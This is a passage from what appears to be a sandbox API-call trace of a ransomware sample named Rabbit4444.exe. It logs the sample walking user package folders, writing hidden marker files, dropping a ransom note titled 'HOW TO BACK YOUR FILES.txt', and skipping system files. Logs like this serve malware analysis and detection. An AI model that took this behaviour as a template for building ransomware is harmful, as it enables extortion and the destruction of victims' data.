ftCreationTime.dwLowDateTime=0xee69ff72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee69ff72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.234] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0062.234] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.234] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.235] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.235] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.236] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.236] CloseHandle (hObject=0x298) returned 1 [0062.236] CloseHandle (hObject=0x27c) returned 1 [0062.236] GetCurrentThreadId () returned 0xd98 [0062.236] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0062.236] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies" [0062.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e380 | out: hHeap=0xe0000) returned 1 [0062.237] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0062.237] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies" [0062.237] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\" [0062.237] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0062.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.238] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.240] FlushFileBuffers (hFile=0x27c) returned 1 [0062.241] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.241] CloseHandle (hObject=0x27c) returned 1 [0062.243] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies") returned 93 [0062.243] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.243] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9361b3e5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd23993e3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.243] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.243] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.243] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.243] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.243] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9361b3e5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd23993e3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.243] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.243] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.243] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.243] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.243] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.243] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee6c5f1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee6c5f1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.243] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.243] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.243] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee6c5f1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee6c5f1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.243] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.243] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.244] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.244] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.244] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.244] CloseHandle (hObject=0x298) returned 1 [0062.244] CloseHandle (hObject=0x27c) returned 1 [0062.244] GetCurrentThreadId () returned 0xd98 [0062.245] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0062.245] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0062.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0062.245] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0062.245] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\" [0062.245] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0062.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.246] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.248] FlushFileBuffers (hFile=0x27c) returned 1 [0062.249] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.250] CloseHandle (hObject=0x27c) returned 1 [0062.250] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned 91 [0062.250] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.250] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9361a05c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd2398935, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0062.250] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.250] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.250] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.250] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.250] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9361a05c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd2398935, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.250] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.250] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.250] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.251] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.251] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.251] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee6c5f1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee6c5f1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.251] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.251] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.251] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee6c5f1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee6c5f1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee6c5f1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.251] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0062.251] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.251] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.251] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.252] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.252] CloseHandle (hObject=0x298) returned 1 [0062.252] CloseHandle (hObject=0x27c) returned 1 [0062.252] GetCurrentThreadId () returned 0xd98 [0062.252] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0062.252] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy" [0062.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118e98 | out: hHeap=0xe0000) returned 1 [0062.252] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0062.252] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy" [0062.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\" [0062.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0062.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.255] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.258] FlushFileBuffers (hFile=0x27c) returned 1 [0062.259] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.259] CloseHandle (hObject=0x27c) returned 1 [0062.259] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy") returned 81 [0062.259] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.259] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91227223, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x6f58a0ab, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee6ec238, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0062.259] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.259] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.259] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.259] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.259] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91227223, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x6f58a0ab, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee6ec238, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.260] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.260] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.260] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.260] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.260] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.260] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee6ec238, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee6ec238, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee6ec238, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.260] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.260] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.260] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x39a819cf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x39a819cf, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0062.260] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0062.260] lstrcpyW (in: lpString1=0x130ebdc, lpString2="AC" | out: lpString1="AC") returned="AC" [0062.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0062.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x123d48 [0062.260] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122108 [0062.260] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9162d1b2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223f2ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9162d1b2, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, 